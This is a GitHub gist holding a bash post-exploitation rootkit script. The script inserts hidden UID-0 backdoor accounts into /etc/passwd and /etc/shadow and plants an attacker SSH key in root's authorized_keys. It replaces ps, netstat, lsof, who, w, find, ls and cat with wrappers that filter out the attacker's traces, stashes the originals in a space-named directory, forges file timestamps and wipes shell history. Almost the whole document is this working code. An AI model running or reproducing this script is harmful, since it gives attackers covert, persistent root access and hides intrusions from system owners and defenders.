Last active
April 3, 2022 02:23
-
-
Save sbehrens/2050556 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# TODO | |
# copy binarys to new location, execute from said location. ensure ps command filters out commands | |
#PORT="1337" | |
# Add users, cat ssh key for ssh key access, clear history, copy shells with sguid bit set to hidden files for later use | |
deluser news > /dev/null 2>&1 | |
deluser list > /dev/null 2>&1 | |
sed '7ilist:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt | |
sed '7ilist:$6$Pgr2zg2C$dXr7E7txxsnqGvGYOqYxF5KwkLjQx70gFjuoXIi2PclRxDlm4.jDAvJRhu7OHPG3rRblV29XuQ6mBRcUog1MW0:15401:0:99999:7:::' /etc/shadow > /tmp/out.txt && cat /tmp/out.txt > /etc/shadow && rm /tmp/out.txt | |
sed '8inews:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt | |
sed '8inews:$6$Pgr2zg2C$dXr7E7txxsnqGvGYOqYxF5KwkLjQx70gFjuoXIi2PclRxDlm4.jDAvJRhu7OHPG3rRblV29XuQ6mBRcUog1MW0:15401:0:99999:7:::' /etc/shadow > /tmp/out.txt && cat /tmp/out.txt > /etc/shadow && rm /tmp/out.txt | |
mkdir /root/.ssh > /dev/null 2>&1; echo " ssh-dss AAAAB3NzaC1kc3MAAACBANux0TRi7X4Jet/Y/9Nyo517a1YskOqr4iBKEmDXf9qvKLUvdsEfBuJ4uAa3IEcCuE+9Rs/TtJYJOmpD9uCV9lNo/ZNZqCZDr2ERDcusM3L7T0ZwyZewQvixsJ9VZRffYOv8vtaT9Xu9Y+ILXNZDOx39evoqGqsPGb7w3zboHcjNAAAAFQDEn+/NLtr2oPNUlLnt/0kwH+w0UQAAAIBKTkDXiuBHGM7vKYXraFdcVgl/XYuHnChypzAVEqwNHBRbGUg4OHr29j7ncIYK2Y7zvO4KdrJ/uohm1cGSHsmXESiNjPnhFJHo6tIaNlpTk/YzTiPmJk8Wc/hdjdCamBF++3NsixMo7OfqDqXS461QpXKDdTa/rqi0fHsgLIcDKgAAAIBSzxtMPcoF3k+UQmtwIlUQt8tDt0OaCxoO8A+R7GW1rbqPDJXbHHWZVsf/7IS1WRvrajISiVPEPxIAPZVAv1HFTrMseKoMF1xYaS27q6ld1cIBK4CXPW2zzgnpDgqpCVkQEsfSfISgQ6EbU3dff/ipGOGvEFBT5doh8dZRqA+Bng== root@bt" >>/root/.ssh/authorized_keys | |
# create " " dir used for holding actual binarys and other thigns if needed | |
dirstamp="`ls -ld /bin/cat | awk {'print $6'} 2>./log.error`" | |
echo $dirstamp | |
mkdir /usr/lib/" " | |
touch -d $dirstamp /usr/lib/" " | |
# copy grep over for all other pwnage | |
cp /bin/grep /usr/lib/" "/ | |
# create error log file for testing | |
touch log.error | |
# lsof ownage | |
lsofstamp="`ls -l /usr/bin/lsof 2>log.error | awk {'print $6'}`" | |
echo $lsofstamp | |
touch ./lsof | |
chmod 755 ./lsof | |
read -d '' lsof <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/lsof $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$lsof" > lsof | |
mv /usr/bin/lsof /usr/lib/" "/ | |
mv ./lsof /usr/bin/ | |
touch -d $lsofstamp /usr/bin/lsof | |
# Netstat ownage | |
netstatstamp="`ls -l /bin/netstat 2>log.error | awk {'print $6'}`" | |
echo $netstatstamp | |
touch ./netstat | |
chmod 755 ./netstat | |
read -d '' netstat <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/netstat $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$netstat" > netstat | |
mv /bin/netstat /usr/lib/" "/ | |
mv ./netstat /bin/ | |
touch -d $netstatstamp /bin/netstat | |
# ps command hack | |
psstamp="`ls -l /bin/ps 2>log.error | awk {'print $6'}`" | |
echo $psstamp | |
touch ./ps | |
chmod 755 ./ps | |
read -d '' ps <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/ps $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$ps" > ps | |
mv /bin/ps /usr/lib/" "/ | |
mv ./ps /bin/ | |
touch -d $psstamp /bin/ps | |
# who command hack | |
whostamp="`ls -l /usr/bin/who 2>log.error | awk {'print $6'}`" | |
echo $whostamp | |
touch ./who | |
chmod 755 ./who | |
read -d '' who <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/who $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$who" > who | |
mv /usr/bin/who /usr/lib/" "/ | |
mv ./who /usr/bin/ | |
touch -d $whostamp /usr/bin/who | |
# w command hack | |
wstamp="`ls -l /usr/bin/w 2>log.error | awk {'print $6'}`" | |
echo $wstamp | |
touch ./w | |
chmod 755 ./w | |
read -d '' ww <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/w $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$ww" > w | |
mv /usr/bin/w /usr/lib/" "/ | |
mv ./w /usr/bin/ | |
touch -d $wstamp /usr/bin/w | |
# find hack | |
findstamp="`ls -l /usr/bin/find 2>log.error | awk {'print $6'}`" | |
echo $findstamp | |
touch ./find | |
chmod 755 ./find | |
read -d '' find <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/find $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$find" > find | |
mv /usr/bin/find /usr/lib/" "/ | |
mv ./find /usr/bin/ | |
touch -d $findstamp /usr/bin/find | |
# tcpdump hack | |
lsstamp="`ls -l /bin/ls 2>log.error | awk {'print $6'}`" | |
echo $lsstamp | |
touch ./ls | |
chmod 755 ./ls | |
read -d '' ls <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/ls $@ | /usr/lib/" "/grep -v '1337' | /usr/lib/" "/grep -v 'bad_shell2' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$ls" > ls | |
mv /bin/ls /usr/lib/" "/ | |
mv ./ls /bin/ | |
touch -d $lsstamp /bin/ls | |
# Remove stuff | |
cat ~/.bashrc | /usr/lib/" "/grep -v "alias ls" | /usr/lib/" "/grep -v "alias ll" | /usr/lib/" "/grep -v "alias la" | /usr/lib/" "/grep -v "alias l=" > ~/.bashrc | |
#cat ownage | |
catstamp="`ls -l /bin/cat 2>log.error | awk {'print $6'}`" | |
echo $catstamp | |
touch ./cat | |
chmod 755 ./cat | |
read -d '' cat <<"BLOCK" | |
#!/bin/bash | |
/usr/lib/" "/cat $@ | /usr/lib/" "/grep -v 'list' | /usr/lib/" "/grep -v 'news' | /usr/lib/" "/grep -v 'bad_shell3' | |
BLOCK | |
echo "$cat" > cat | |
mv /bin/cat /usr/lib/" "/ | |
mv ./cat /bin/ | |
touch -d $catstamp /bin/cat | |
# clear out history | |
history -c | |
unset HISTFILE | |
rm -rf ~/.bash_history > /dev/null 2>&1 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment